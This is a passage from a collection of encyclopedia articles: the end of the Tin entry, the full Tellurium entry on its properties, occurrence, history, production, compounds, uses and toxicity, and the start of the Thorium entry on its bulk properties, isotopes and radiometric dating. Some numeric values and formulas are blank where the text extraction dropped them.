in a pipe organ are of a tin/lead alloy, with 50/50 as the most common composition. The proportion of tin in the pipe defines the pipe's tone, since tin has a desirable tonal resonance. When a tin/lead alloy cools, the lead phase solidifies first, then when the eutectic temperature is reached, the remaining liquid forms the layered tin/lead eutectic structure, which is shiny; contrast with the lead phase produces a mottled or spotted effect. This metal alloy is referred to as spotted metal. Major advantages of using tin for pipes include its appearance, workability, and resistance to corrosion. Manufacturing of chemicals Tin compounds are used in the production of various chemicals, including stabilizers for PVC and catalysts for industrial processes. Tin in form of ingots provide the raw material necessary for these chemical reactions, ensuring consistent quality and performance. Optoelectronics The oxides of indium and tin are electrically conductive and transparent, and are used to make transparent electrically conducting films with applications in optoelectronics devices such as liquid crystal displays. Other applications Punched tin-plated steel, also called pierced tin, is an artisan technique originating in central Europe for creating functional and decorative housewares. Decorative piercing designs exist in a wide variety, based on local tradition and the artisan. Punched tin lanterns are the most common application of this artisan technique. The light of a candle shining through the pierced design creates a decorative light pattern in the room where it sits. Lanterns and other punched tin articles were created in the New World from the earliest European settlement. A well-known example is the Revere lantern, named after Paul Revere. In America, pie safes and food safes were in use in the days before refrigeration. These were wooden cupboards of various styles and sizes – either floor standing or hanging cupboards meant to discourage vermin and insects and to keep dust from perishable foodstuffs. These cabinets had tinplate inserts in the doors and sometimes in the sides, punched out by the homeowner, cabinetmaker, or a tinsmith in varying designs to allow for air circulation while excluding flies. Modern reproductions of these articles remain popular in North America. Window glass is most often made by floating molten glass on molten tin (float glass), resulting in a flat and flawless surface. This is also called the "Pilkington process". Tin is used as a negative electrode in advanced Li-ion batteries. Its application is somewhat limited by the fact that some tin surfaces catalyze decomposition of carbonate-based electrolytes used in Li-ion batteries. Tin(II) fluoride is added to some dental care products as stannous fluoride (SnF2). Tin(II) fluoride can be mixed with calcium abrasives while the more common sodium fluoride gradually becomes biologically inactive in the presence of calcium compounds. It has also been shown to be more effective than sodium fluoride in controlling gingivitis. Tin is used as a target to create laser-induced plasmas that act as the light source for extreme ultraviolet lithography. Organotin compounds Organotin compounds are organometallic compounds containing tin–carbon bonds. Worldwide industrial production of organotin compounds likely exceeds 50,000 tonnes. PVC stabilizers The major commercial application of organotin compounds is in the stabilization of PVC plastics. In the absence of such stabilizers, PVC would rapidly degrade under heat, light, and atmospheric oxygen, resulting in discolored, brittle products. Tin scavenges labile chloride ions (Cl−), which would otherwise strip HCl from the plastic material. Typical tin compounds are carboxylic acid derivatives of dibutyltin dichloride, such as dibutyltin dilaurate. Biocides Some organotin compounds are relatively toxic, with both advantages and problems. They are used for biocidal properties as fungicides, pesticides, algaecides, wood preservatives, and antifouling agents. Tributyltin oxide is used as a wood preservative. Tributyltin is used for various industrial purposes such as slime control in paper mills and disinfection of circulating industrial cooling waters. Tributyltin was used as additive for ship paint to prevent growth of fouling organisms on ships, with use declining after organotin compounds were recognized as persistent organic pollutants with high toxicity for some marine organisms (the dog whelk, for example). The EU banned the use of organotin compounds in 2003, while concerns over the toxicity of these compounds to marine life and damage to the reproduction and growth of some marine species (some reports describe biological effects to marine life at a concentration of 1 nanogram per liter) have led to a worldwide ban by the International Maritime Organization. Many nations now restrict the use of organotin compounds to vessels greater than long. The persistence of tributyltin in the aquatic environment is dependent upon the nature of the ecosystem. Because of this persistence and its use as an additive in ship paint, high concentrations of tributyltin have been found in marine sediments located near naval docks. Tributyltin has been used as a biomarker for imposex in neogastropods, with at least 82 known species. With the high levels of TBT in the local inshore areas, due to shipping activities, the shellfish had an adverse effect. Imposex is the imposition of male sexual characteristics on female specimens where they grow a penis and a pallial vas deferens. A high level of TBT can damage mammalian endocrine glands, reproductive and central nervous systems, bone structure and gastrointestinal tract. Tributyltin also affect mammals, Including sea otters, whales, dolphins, and humans. Organic chemistry Some tin reagents are useful in organic chemistry. In the largest application, stannous chloride is a common reducing agent for the conversion of nitro and oxime groups to amines. The Stille reaction couples organotin compounds with organic halides or pseudohalides. Li-ion batteries Tin forms several inter-metallic phases with lithium metal, making it a potentially attractive material for battery applications. Large volumetric expansion of tin upon alloying with lithium and instability of the tin-organic electrolyte interface at low electrochemical potentials are the greatest challenges to employment in commercial cells. Tin inter-metallic compound with cobalt and carbon was implemented by Sony in its Nexelion cells released in the late 2000s. The composition of the active material is approximately Sn0.3Co0.4C0.3. Research showed that only some crystalline facets of tetragonal (beta) Sn are responsible for undesirable electrochemical activity. Precautions Cases of poisoning from tin metal, its oxides, and its salts are almost unknown. On the other hand, certain organotin compounds are almost as toxic as cyanide. Exposure to tin in the workplace can occur by inhalation, skin contact, and eye contact. The US Occupational Safety and Health Administration (OSHA) set the permissible exposure limit for tin exposure in the workplace as 2 mg/m3 over an 8-hour workday. The National Institute for Occupational Safety and Health (NIOSH) determined a recommended exposure limit (REL) of 2 mg/m3 over an 8-hour workday. At levels of 100 mg/m3, tin is immediately dangerous to life and health.
Physical sciences
Chemical elements_2
null
30043
https://en.wikipedia.org/wiki/Tellurium
Tellurium
Tellurium is a chemical element; it has symbol Te and atomic number 52. It is a brittle, mildly toxic, rare, silver-white metalloid. Tellurium is chemically related to selenium and sulfur, all three of which are chalcogens. It is occasionally found in its native form as elemental crystals. Tellurium is far more common in the Universe as a whole than on Earth. Its extreme rarity in the Earth's crust, comparable to that of platinum, is due partly to its formation of a volatile hydride that caused tellurium to be lost to space as a gas during the hot nebular formation of Earth. Tellurium-bearing compounds were first discovered in 1782 in a gold mine in Kleinschlatten, Transylvania (now Zlatna, Romania) by Austrian mineralogist Franz-Joseph Müller von Reichenstein, although it was Martin Heinrich Klaproth who named the new element in 1798 after the Latin 'earth'. Gold telluride minerals are the most notable natural gold compounds. However, they are not a commercially significant source of tellurium itself, which is normally extracted as a by-product of copper and lead production. Commercially, the primary use of tellurium is CdTe solar panels and thermoelectric devices. A more traditional application in copper (tellurium copper) and steel alloys, where tellurium improves machinability, also consumes a considerable portion of tellurium production. Tellurium is considered a technology-critical element. Tellurium has no biological function, although fungi can use it in place of sulfur and selenium in amino acids such as tellurocysteine and telluromethionine. In humans, tellurium is partly metabolized into dimethyl telluride, (CH3)2Te, a gas with a garlic-like odor exhaled in the breath of victims of tellurium exposure or poisoning. Characteristics Physical properties Tellurium has two allotropes, crystalline and amorphous. When crystalline, tellurium is silvery-white with a metallic luster. The crystals are trigonal and chiral (space group 152 or 154 depending on the chirality), like the gray form of selenium. It is a brittle and easily pulverized metalloid. Amorphous tellurium is a black-brown powder prepared by precipitating it from a solution of tellurous acid or telluric acid (Te(OH)6). Tellurium is a semiconductor that shows greater electrical conductivity in certain directions depending on atomic alignment; the conductivity increases slightly when exposed to light (photoconductivity). When molten, tellurium is corrosive to copper, iron, and stainless steel. Of the chalcogens (oxygen-family elements), tellurium has the highest melting and boiling points, at , respectively. Chemical properties Crystalline tellurium consists of parallel helical chains of Te atoms, with three atoms per turn. This gray material resists oxidation by air and is not volatile. Isotopes Naturally occurring tellurium has eight isotopes. Six of those isotopes, 120Te, 122Te, 123Te, 124Te, 125Te, and 126Te, are stable. The other two, 128Te and 130Te, are slightly radioactive, with extremely long half-lives, including 2.2 × 1024 years for 128Te. This is the longest known half-life among all radionuclides and is about 160 trillion (1012) times the age of the known universe. A further 31 artificial radioisotopes of tellurium are known, with atomic masses ranging from 104 to 142 and with half-lives of 19 days or less. Also, 17 nuclear isomers are known, with half-lives up to 154 days. Except for beryllium-8 and beta-delayed alpha emission branches in some lighter nuclides, tellurium (104Te to 109Te) is the second lightest element with isotopes known to undergo alpha decay, antimony being the lightest. The atomic mass of tellurium () exceeds that of iodine (), the next element in the periodic table. Occurrence With an abundance in the Earth's crust comparable to that of platinum (about 1 μg/kg), tellurium is one of the rarest stable solid elements. In comparison, even thulium – the rarest of the stable lanthanides – has crystal abundances of 500 μg/kg (see Abundance of the chemical elements). The rarity of tellurium in the Earth's crust is not a reflection of its cosmic abundance. Tellurium is more abundant than rubidium in the cosmos, though rubidium is 10,000 times more abundant in the Earth's crust. The rarity of tellurium on Earth is thought to be caused by conditions during preaccretional sorting in the solar nebula, when the stable form of certain elements, in the absence of oxygen and water, was controlled by the reductive power of free hydrogen. Under this scenario, certain elements that form volatile hydrides, such as tellurium, were severely depleted through the evaporation of these hydrides. Tellurium and selenium are the heavy elements most depleted by this process. Tellurium is sometimes found in its native (i.e., elemental) form, but is more often found as the tellurides of gold such as calaverite and krennerite (two different polymorphs of AuTe2), petzite, Ag3AuTe2, and sylvanite, AgAuTe4. The town of Telluride, Colorado, was named in the hope of a strike of gold telluride (which never materialized, though gold metal ore was found). Gold itself is usually found uncombined, but when found as a chemical compound, it is often combined with tellurium. Although tellurium is found with gold more often than in uncombined form, it is found even more often combined as tellurides of more common metals (e.g. melonite, NiTe2). Natural tellurite and tellurate minerals also occur, formed by the oxidation of tellurides near the Earth's surface. In contrast to selenium, tellurium does not usually replace sulfur in minerals because of the great difference in ion radii. Thus, many common sulfide minerals contain substantial quantities of selenium and only traces of tellurium. In the gold rush of 1893, miners in Kalgoorlie discarded a pyritic material as they searched for pure gold, and it was used to fill in potholes and build sidewalks. In 1896, that tailing was discovered to be calaverite, a telluride of gold, and it sparked a second gold rush that included mining the streets. In 2023 astronomers detected the creation of tellurium during collision between two neutron stars. History Tellurium (Latin tellus meaning "earth") was discovered in the 18th century in a gold ore from the mines in Kleinschlatten (today Zlatna), near today's city of Alba Iulia, Romania. This ore was known as "Faczebajer weißes blättriges Golderz" (white leafy gold ore from Faczebaja, German name of Facebánya, now Fața Băii in Alba County) or antimonalischer Goldkies (antimonic gold pyrite), and according to Anton von Rupprecht, was Spießglaskönig (argent molybdique), containing native antimony. In 1782 Franz-Joseph Müller von Reichenstein, who was then serving as the Austrian chief inspector of mines in Transylvania, concluded that the ore did not contain antimony but was bismuth sulfide. The following year, he reported that this was erroneous and that the ore contained mostly gold and an unknown metal very similar to antimony. After a thorough investigation that lasted three years and included more than fifty tests, Müller determined the specific gravity of the mineral and noted that when heated, the new metal gives off a white smoke with a radish-like odor; that it imparts a red color to sulfuric acid; and that when this solution is diluted with water, it has a black precipitate. Nevertheless, he was not able to identify this metal and gave it the names aurum paradoxum (paradoxical gold) and metallum problematicum (problem metal), because it did not exhibit the properties predicted for antimony. In 1789, a Hungarian scientist, Pál Kitaibel, discovered the element independently in an ore from Deutsch-Pilsen that had been regarded as argentiferous molybdenite, but later he gave the credit to Müller. In 1798, it was named by Martin Heinrich Klaproth, who had earlier isolated it from the mineral calaverite. In the early 1920s, Thomas Midgley Jr. found tellurium prevented engine knocking when added to fuel, but ruled it out due to the difficult-to-eradicate smell. Midgley went on to discover and popularize the use of tetraethyl lead. The 1960s brought an increase in thermoelectric applications for tellurium (as bismuth telluride), and in free-machining steel alloys, which became the dominant use. These applications were overtaken by the growing importance of CdTe in thin-film solar cells in the 2000s. Production Most Te (and Se) is obtained from porphyry copper deposits, where it occurs in trace amounts. The element is recovered from anode sludges from the electrolytic refining of blister copper. It is a component of dusts from blast furnace refining of lead. Treatment of 1000 tons of copper ore yields approximately of tellurium. The anode sludges contain the selenides and tellurides of the noble metals in compounds with the formula M2Se or M2Te (M = Cu, Ag, Au). At temperatures of 500 °C the anode sludges are roasted with sodium carbonate under air. The metal ions are reduced to the metals, while the telluride is converted to sodium tellurite. Tellurites can be leached from the mixture with water and are normally present as hydrotellurites HTeO3− in solution. Selenites are also formed during this process, but they can be separated by adding sulfuric acid. The hydrotellurites are converted into the insoluble tellurium dioxide while the selenites stay in solution. The metal is produced from the oxide (reduced) either by electrolysis or by reacting the tellurium dioxide with sulfur dioxide in sulfuric acid. Commercial-grade tellurium is usually marketed as 200-mesh powder but is also available as slabs, ingots, sticks, or lumps. The year-end price for tellurium in 2000 was US$30 per kilogram. In recent years, the tellurium price was driven up by increased demand and limited supply, reaching as high as US$220 per pound in 2006. The average annual price for 99.99%-pure tellurium increased from $38 per kilogram in 2017 to $74 per kilogram in 2018. Despite the expectation that improved production methods will double production, the United States Department of Energy (DoE) anticipates a supply shortfall of tellurium by 2025. In the 2020s, China produced ca. 50% of world's tellurium and was the only country that mined Te as the main target rather than a by-product. This dominance was driven by the rapid expansion of solar cell industry in China. In 2022, the largest Te providers by volume were China (340 tonnes), Russia (80 t), Japan (70 t), Canada (50 t), Uzbekistan (50 t), Sweden (40 t) and the United States (no official data). Compounds Tellurium belongs to the chalcogen (group 16) family of elements on the periodic table, which also includes oxygen, sulfur, selenium and polonium: Tellurium and selenium compounds are similar. Tellurium exhibits the oxidation states −2, +2, +4 and +6, with +4 being most common. Tellurides Reduction of Te metal produces the tellurides and polytellurides, Ten2−. The −2 oxidation state is exhibited in binary compounds with many metals, such as zinc telluride, , produced by heating tellurium with zinc. Decomposition of with hydrochloric acid yields hydrogen telluride (), a highly unstable analogue of the other chalcogen hydrides, , and : Halides The +2 oxidation state is exhibited by the dihalides, , and . The dihalides have not been obtained in pure form, although they are known decomposition products of the tetrahalides in organic solvents, and the derived tetrahalotellurates are well-characterized: where X is Cl, Br, or I. These anions are square planar in geometry. Polynuclear anionic species also exist, such as the dark brown , and the black . With fluorine Te forms the mixed-valence and . In the +6 oxidation state, the structural group occurs in a number of compounds such as , , , and . The square antiprismatic anion is also attested. The other halogens do not form halides with tellurium in the +6 oxidation state, but only tetrahalides (, and ) in the +4 state, and other lower halides (, , , and two forms of ). In the +4 oxidation state, halotellurate anions are known, such as and . Halotellurium cations are also attested, including , found in . Oxocompounds Tellurium monoxide was first reported in 1883 as a black amorphous solid formed by the heat decomposition of in vacuum, disproportionating into tellurium dioxide, and elemental tellurium upon heating. Since then, however, existence in the solid phase is doubted and in dispute, although it is known as a vapor fragment; the black solid may be merely an equimolar mixture of elemental tellurium and tellurium dioxide. Tellurium dioxide is formed by heating tellurium in air, where it burns with a blue flame. Tellurium trioxide, β-, is obtained by thermal decomposition of . The other two forms of trioxide reported in the literature, the α- and γ- forms, were found not to be true oxides of tellurium in the +6 oxidation state, but a mixture of , and . Tellurium also exhibits mixed-valence oxides, and . The tellurium oxides and hydrated oxides form a series of acids, including tellurous acid (), orthotelluric acid () and metatelluric acid (). The two forms of telluric acid form tellurate salts containing the TeO and TeO anions, respectively. Tellurous acid forms tellurite salts containing the anion TeO. Zintl cations When tellurium is treated with concentrated sulfuric acid, the result is a red solution of the Zintl ion, . The oxidation of tellurium by in liquid produces the same square planar cation, in addition to the trigonal prismatic, yellow-orange : Other tellurium Zintl cations include the polymeric and the blue-black , consisting of two fused 5-membered tellurium rings. The latter cation is formed by the reaction of tellurium with tungsten hexachloride: Interchalcogen cations also exist, such as (distorted cubic geometry) and . These are formed by oxidizing mixtures of tellurium and selenium with or . Organotellurium compounds Tellurium does not readily form analogues of alcohols and thiols, with the functional group –TeH, that are called tellurols. The –TeH functional group is also attributed using the prefix tellanyl-. Like H2Te, these species are unstable with respect to loss of hydrogen. Telluraethers (R–Te–R) are more stable, as are telluroxides. Tritelluride quantum materials Recently, physicists and materials scientists have been discovering unusual quantum properties associated with layered compounds composed of tellurium that's combined with certain rare-earth elements, as well as yttrium (Y). These novel materials have the general formula of R Te3, where "R " represents a rare-earth lanthanide (or Y), with the full family consisting of R = Y, lanthanum (La), cerium (Ce), praseodymium (Pr), neodymium (Nd), samarium (Sm), gadolinium (Gd), terbium (Tb), dysprosium (Dy), holmium (Ho), erbium (Er), and thulium (Tm). Compounds containing promethium (Pm), europium (Eu), ytterbium (Yb), and lutetium (Lu) have not yet been observed. These materials have a two-dimensional character within an orthorhombic crystal structure, with slabs of R Te separated by sheets of pure tellurium. It is thought that this 2-D layered structure is what leads to a number of interesting quantum features, such as charge-density waves, high carrier mobility, superconductivity under specific conditions, and other peculiar properties whose natures are only now emerging. For example, in 2022, a small group of physicists at Boston College in Massachusetts led an international team that used optical methods to demonstrate a novel axial mode of a Higgs-like particle in R Te3 compounds that incorporate either of two rare-earth elements (R = La, Gd). This long-hypothesized, axial, Higgs-like particle also shows magnetic properties and may serve as a candidate for dark matter. Applications In 2022, the major applications of tellurium were thin-film solar cells (40%), thermoelectrics (30%), metallurgy (15%), and rubber (5%), with the first two applications experiencing a rapid increase owing to the worldwide tendency of reducing dependence on the fossil fuel. In metallurgy, tellurium is added to iron, stainless steel, copper, and lead alloys. It improves the machinability of copper without reducing its high electrical conductivity. It increases resistance to vibration and fatigue of lead and stabilizes various carbides and in malleable iron. Heterogeneous catalysis Tellurium oxides are components of commercial oxidation catalysts. Te-containing catalysts are used for the ammoxidation route to acrylonitrile (CH2=CH–C≡N): Related catalysts are used in the production of tetramethylene glycol: Niche Synthetic rubber vulcanized with tellurium shows mechanical and thermal properties that in some ways are superior to sulfur-vulcanized materials. Tellurium compounds are specialized pigments for ceramics. Selenides and tellurides greatly increase the optical refraction of glass widely used in glass optical fibers for telecommunications. Mixtures of selenium and tellurium are used with barium peroxide as an oxidizer in the delay powder of electric blasting caps. Neutron bombardment of tellurium is the most common way to produce iodine-131. This in turn is used to treat some thyroid conditions, and as a tracer compound in hydraulic fracturing, among other applications. Semiconductor and electronic Cadmium telluride (CdTe) solar panels exhibit some of the greatest efficiencies for solar cell electric power generators. In 2018, China installed thin-film solar panels with a total power output of 175 GW, more than any other country in the world; most of those panels were made of CdTe. In June 2022, China set goals of generating 25% of energy consumption and installing 1.2 billion kilowatts of capacity for wind and solar power by 2030. This proposal will increase the demand for tellurium and its production worldwide, especially in China, where the annual volumes of Te refining increased from 280 tonnes in 2017 to 340 tonnes in 2022. is an efficient material for detecting X-rays. It is being used in the NASA space-based X-ray telescope NuSTAR. Mercury cadmium telluride is a semiconductor material that is used in thermal imaging devices. Organotellurium compounds Organotellurium compounds are mainly of interest in the research context. Several have been examined such as precursors for metalorganic vapor phase epitaxy growth of II-VI compound semiconductors. These precursor compounds include dimethyl telluride, diethyl telluride, diisopropyl telluride, diallyl telluride, and methyl allyl telluride. Diisopropyl telluride (DIPTe) is the preferred precursor for low-temperature growth of CdHgTe by MOVPE. The greatest purity metalorganics of both selenium and tellurium are used in these processes. The compounds for semiconductor industry and are prepared by adduct purification. Tellurium suboxide is used in the media layer of rewritable optical discs, including ReWritable Compact Discs (CD-RW), ReWritable Digital Video Discs (DVD-RW), and ReWritable Blu-ray Discs. Tellurium is used in the phase change memory chips developed by Intel. Bismuth telluride (Bi2Te3) and lead telluride are working elements of thermoelectric devices. Lead telluride exhibits promise in far-infrared detectors. Photocathodes Tellurium shows up in a number of photocathodes used in solar blind photomultiplier tubes and for high brightness photoinjectors driving modern particle accelerators. The photocathode Cs-Te, which is predominantly Cs2Te, has a photoemission threshold of 3.5 eV and exhibits the uncommon combination of high quantum efficiency (>10%) and high durability in poor vacuum environments (lasting for months under use in RF electron guns). This has made it the go to choice for photoemission electron guns used in driving free electron lasers. In this application, it is usually driven at the wavelength 267 nm which is the third harmonic of commonly used Ti-sapphire lasers. More Te containing photocathodes have been grown using other alkali metals such as rubidium, Potassium, and Sodium, but they have not found the same popularity that Cs-Te has enjoyed. Thermoelectric material Tellurium itself can be used as a high-performance elemental thermoelectric material. A trigonal Te with the space group of P3121 can transfer into a topological insulator phase, which is suitable for thermoelectric material. Though often not considered as a thermoelectric material alone, polycrystalline tellurium does show great thermoelectric performance with the thermoelectric figure of merit, zT, as high as 1.0, which is even higher than some of other conventional TE materials like SiGe and BiSb. Telluride, which is a compound form of tellurium, is a more common TE material. Typical and ongoing research includes Bi2Te3, and La3-xTe4, etc. Bi2Te3 is widely used from energy conversion to sensing to cooling due to its great TE properties. The BiTe-based TE material can achieve a conversion efficiency of 8%, an average zT value of 1.05 for p-type and 0.84 for n-type bismuth telluride alloys. Lanthanum telluride can be potentially used in deep space as a thermoelectric generator due to the huge temperature difference in space. The zT value reaches to a maximum of ~1.0 for a La3-xTe4 system with x near 0.2. This composition also allows other chemical substitution which may enhance the TE performance. The addition of Yb, for example, may increase the zT value from 1.0 to 1.2 at 1275K, which is greater than the current SiGe power system. Biological role Tellurium has no known biological function, although fungi can incorporate it in place of sulfur and selenium into amino acids such as telluro-cysteine and telluro-methionine. Organisms have shown a highly variable tolerance to tellurium compounds. Many bacteria, such as Pseudomonas aeruginosa and Gayadomonas sp, take up tellurite and reduce it to elemental tellurium, which accumulates and causes a characteristic and often dramatic darkening of cells. In yeast, this reduction is mediated by the sulfate assimilation pathway. Tellurium accumulation seems to account for a major part of the toxicity effects. Many organisms also metabolize tellurium partly to form dimethyl telluride, although dimethyl ditelluride is also formed by some species. Dimethyl telluride has been observed in hot springs at very low concentrations. Tellurite agar is used to identify members of the corynebacterium genus, most typically Corynebacterium diphtheriae, the pathogen responsible for diphtheria. Precautions Tellurium and tellurium compounds are considered to be mildly toxic and need to be handled with care, although acute poisoning is rare. Tellurium poisoning is particularly difficult to treat as many chelation agents used in the treatment of metal poisoning will increase the toxicity of tellurium. Tellurium is not reported to be carcinogenic, but it may be fatal if inhaled, swallowed, or absorbed through skin. Humans exposed to as little as 0.01 mg/m3 or less in air exude a foul garlic-like odor known as "tellurium breath". This is caused by the body converting tellurium from any oxidation state to dimethyl telluride, (CH3)2Te, a volatile compound with a pungent garlic-like smell. Volunteers given 15 mg of tellurium still had this characteristic smell on their breath eight months later. In laboratories, this odor makes it possible to discern which scientists are responsible for tellurium chemistry, and even which books they have handled in the past. Even though the metabolic pathways of tellurium are not known, it is generally assumed that they resemble those of the more extensively studied selenium because the final methylated metabolic products of the two elements are similar. People can be exposed to tellurium in the workplace by inhalation, ingestion, skin contact, and eye contact. The Occupational Safety and Health Administration (OSHA) limits (permissible exposure limit) tellurium exposure in the workplace to 0.1 mg/m3 over an eight-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set the recommended exposure limit (REL) at 0.1 mg/m3 over an eight-hour workday. In concentrations of 25 mg/m3, tellurium is immediately dangerous to life and health.
Physical sciences
Chemical elements_2
null
30044
https://en.wikipedia.org/wiki/Thorium
Thorium
Thorium is a chemical element; it has symbol Th and atomic number 90. Thorium is a weakly radioactive light silver metal which tarnishes olive grey when it is exposed to air, forming thorium dioxide; it is moderately soft, malleable, and has a high melting point. Thorium is an electropositive actinide whose chemistry is dominated by the +4 oxidation state; it is quite reactive and can ignite in air when finely divided. All known thorium isotopes are unstable. The most stable isotope, 232Th, has a half-life of 14.05 billion years, or about the age of the universe; it decays very slowly via alpha decay, starting a decay chain named the thorium series that ends at stable 208Pb. On Earth, thorium and uranium are the only elements with no stable or nearly-stable isotopes that still occur naturally in large quantities as primordial elements. Thorium is estimated to be over three times as abundant as uranium in the Earth's crust, and is chiefly refined from monazite sands as a by-product of extracting rare-earth elements. Thorium was discovered in 1828 by the Norwegian amateur mineralogist Morten Thrane Esmark and identified by the Swedish chemist Jöns Jacob Berzelius, who named it after Thor, the Norse god of thunder and war, because of its power. Its first applications were developed in the late 19th century. Thorium's radioactivity was widely acknowledged during the first decades of the 20th century. In the second half of the century, thorium was replaced in many uses due to concerns about its radioactivity. Thorium is still being used as an alloying element in TIG welding electrodes but is slowly being replaced in the field with different compositions. It was also material in high-end optics and scientific instrumentation, used in some broadcast vacuum tubes, and as the light source in gas mantles, but these uses have become marginal. It has been suggested as a replacement for uranium as nuclear fuel in nuclear reactors, and several thorium reactors have been built. Thorium is also used in strengthening magnesium, coating tungsten wire in electrical and welding equipment, controlling the grain size of tungsten in electric lamps, high-temperature crucibles, and glasses including camera and scientific instrument lenses. Other uses for thorium include heat-resistant ceramics, aircraft engines, and in light bulbs. Ocean science has utilised 231Pa/230Th isotope ratios to understand the ancient ocean. Bulk properties Thorium is a moderately soft, paramagnetic, bright silvery radioactive actinide metal that can be bent or shaped. In the periodic table, it lies to the right of actinium, to the left of protactinium, and below cerium. Pure thorium is very ductile and, as normal for metals, can be cold-rolled, swaged, and drawn. At room temperature, thorium metal has a face-centred cubic crystal structure; it has two other forms, one at high temperature (over 1360 °C; body-centred cubic) and one at high pressure (around 100 GPa; body-centred tetragonal). Thorium metal has a bulk modulus (a measure of resistance to compression of a material) of 54 GPa, about the same as tin's (58.2 GPa). Aluminium's is 75.2 GPa; copper's 137.8 GPa; and mild steel's is 160–169 GPa. Thorium is about as hard as soft steel, so when heated it can be rolled into sheets and pulled into wire. Thorium is nearly half as dense as uranium and plutonium and is harder than both. It becomes superconductive below 1.4 K. Thorium's melting point of 1750 °C is above both those of actinium (1227 °C) and protactinium (1568 °C). At the start of period 7, from francium to thorium, the melting points of the elements increase (as in other periods), because the number of delocalised electrons each atom contributes increases from one in francium to four in thorium, leading to greater attraction between these electrons and the metal ions as their charge increases from one to four. After thorium, there is a new downward trend in melting points from thorium to plutonium, where the number of f electrons increases from about 0.4 to about 6: this trend is due to the increasing hybridisation of the 5f and 6d orbitals and the formation of directional bonds resulting in more complex crystal structures and weakened metallic bonding. (The f-electron count for thorium metal is a non-integer due to a 5f–6d overlap.) Among the actinides up to californium, which can be studied in at least milligram quantities, thorium has the highest melting and boiling points and second-lowest density; only actinium is lighter. Thorium's boiling point of 4788 °C is the fifth-highest among all the elements with known boiling points. The properties of thorium vary widely depending on the degree of impurities in the sample. The major impurity is usually thorium dioxide ); even the purest thorium specimens usually contain about a tenth of a per cent of the dioxide. Experimental measurements of its density give values between 11.5 and 11.66 g/cm3: these are slightly lower than the theoretically expected value of 11.7 g/cm3 calculated from thorium's lattice parameters, perhaps due to microscopic voids forming in the metal when it is cast. These values lie between those of its neighbours actinium (10.1 g/cm3) and protactinium (15.4 g/cm3), part of a trend across the early actinides. Thorium can form alloys with many other metals. Addition of small proportions of thorium improves the mechanical strength of magnesium, and thorium-aluminium alloys have been considered as a way to store thorium in proposed future thorium nuclear reactors. Thorium forms eutectic mixtures with chromium and uranium, and it is completely miscible in both solid and liquid states with its lighter congener cerium. Isotopes There are seven naturally occurring isotopes of Thorium but none are stable. 232Th is one of the two nuclides beyond bismuth (the other being 238U) that have half-lives measured in billions of years; its half-life is 14.05 billion years, about three times the age of the Earth, and slightly longer than the age of the universe. Four-fifths of the thorium present at Earth's formation has survived to the present. 232Th is the only isotope of thorium occurring in quantity in nature. Its stability is attributed to its closed nuclear subshell with 142 neutrons. Thorium has a characteristic terrestrial isotopic composition, with atomic weight . It is one of only four radioactive elements (along with bismuth, protactinium and uranium) that occur in large enough quantities on Earth for a standard atomic weight to be determined. Thorium nuclei are susceptible to alpha decay because the strong nuclear force cannot overcome the electromagnetic repulsion between their protons. The alpha decay of 232Th initiates the 4n decay chain which includes isotopes with a mass number divisible by 4 (hence the name; it is also called the thorium series after its progenitor). This chain of consecutive alpha and beta decays begins with the decay of 232Th to 228Ra and terminates at 208Pb. Any sample of thorium or its compounds contains traces of these daughters, which are isotopes of thallium, lead, bismuth, polonium, radon, radium, and actinium. Natural thorium samples can be chemically purified to extract useful daughter nuclides, such as 212Pb, which is used in nuclear medicine for cancer therapy. 227Th (alpha emitter with an 18.68 days half-life) can also be used in cancer treatments such as targeted alpha therapies. 232Th also very occasionally undergoes spontaneous fission rather than alpha decay, and has left evidence of doing so in its minerals (as trapped xenon gas formed as a fission product), but the partial half-life of this process is very large at over 1021 years and alpha decay predominates. In total, 32 radioisotopes have been characterised, which range in mass number from 207 to 238. After 232Th, the most stable of them (with respective half-lives) are 230Th (75,380 years), 229Th (7,917 years), 228Th (1.92 years), 234Th (24.10 days), and 227Th (18.68 days). All of these isotopes occur in nature as trace radioisotopes due to their presence in the decay chains of 232Th, 235U, 238U, and 237Np: the last of these is long extinct in nature due to its short half-life (2.14 million years), but is continually produced in minute traces from neutron capture in uranium ores. All of the remaining thorium isotopes have half-lives that are less than thirty days and the majority of these have half-lives that are less than ten minutes. 233Th (half-life 22 minutes) occurs naturally as the result of neutron activation of natural 232Th. 226Th (half-life 31 minutes) has not yet been observed in nature, but would be produced by the still-unobserved double beta decay of natural 226Ra. In deep seawaters the isotope 230Th makes up to of natural thorium. This is because its parent 238U is soluble in water, but 230Th is insoluble and precipitates into the sediment. Uranium ores with low thorium concentrations can be purified to produce gram-sized thorium samples of which over a quarter is the 230Th isotope, since 230Th is one of the daughters of 238U. The International Union of Pure and Applied Chemistry (IUPAC) reclassified thorium as a binuclidic element in 2013; it had formerly been considered a mononuclidic element. Thorium has three known nuclear isomers (or metastable states), 216m1Th, 216m2Th, and 229mTh. 229mTh has the lowest known excitation energy of any isomer, measured to be . This is so low that when it undergoes isomeric transition, the emitted gamma radiation is in the ultraviolet range. The nuclear transition from 229Th to 229mTh is being investigated for a nuclear clock. Different isotopes of thorium are chemically identical, but have slightly differing physical properties: for example, the densities of pure 228Th, 229Th, 230Th, and 232Th are respectively expected to be 11.5, 11.6, 11.6, and 11.7 g/cm3. The isotope 229Th is expected to be fissionable with a bare critical mass of 2839 kg, although with steel reflectors this value could drop to 994 kg. 232Th is not fissionable, but it is fertile as it can be converted to fissile 233U by neutron capture and subsequent beta decay. Radiometric dating Two radiometric dating methods involve thorium isotopes: uranium–thorium dating, based on the decay of 234U to 230Th, and ionium–thorium dating, which measures the ratio of 232Th to 230Th. These rely on the fact that 232Th is a primordial radioisotope, but 230Th only occurs as an intermediate decay product in the decay chain of 238U. Uranium–thorium dating is a relatively short-range process because of the short half-lives of 234U and 230Th relative to the age of the Earth: it is also accompanied by a sister process involving the alpha decay of 235U into 231Th, which very quickly becomes the longer-lived 231Pa, and this process is often used to check the results of uranium–thorium dating. Uranium–thorium dating is commonly used to determine the age of calcium carbonate materials such as speleothem or coral, because uranium is more soluble in water than thorium and protactinium, which are selectively precipitated into ocean-floor sediments, where their ratios are measured. The scheme has a range of several hundred thousand years. Ionium–thorium dating is a related process, which exploits the insolubility of thorium (both 232Th and 230Th) and thus its presence in ocean sediments to date these sediments by measuring the ratio of 232Th to 230Th. Both of these dating methods assume that the proportion of 230Th to 232Th is a constant during the period when the sediment layer was formed, that the sediment did not already contain thorium before contributions from the decay of uranium, and that the thorium cannot migrate within the sediment layer. Chemistry A thorium atom 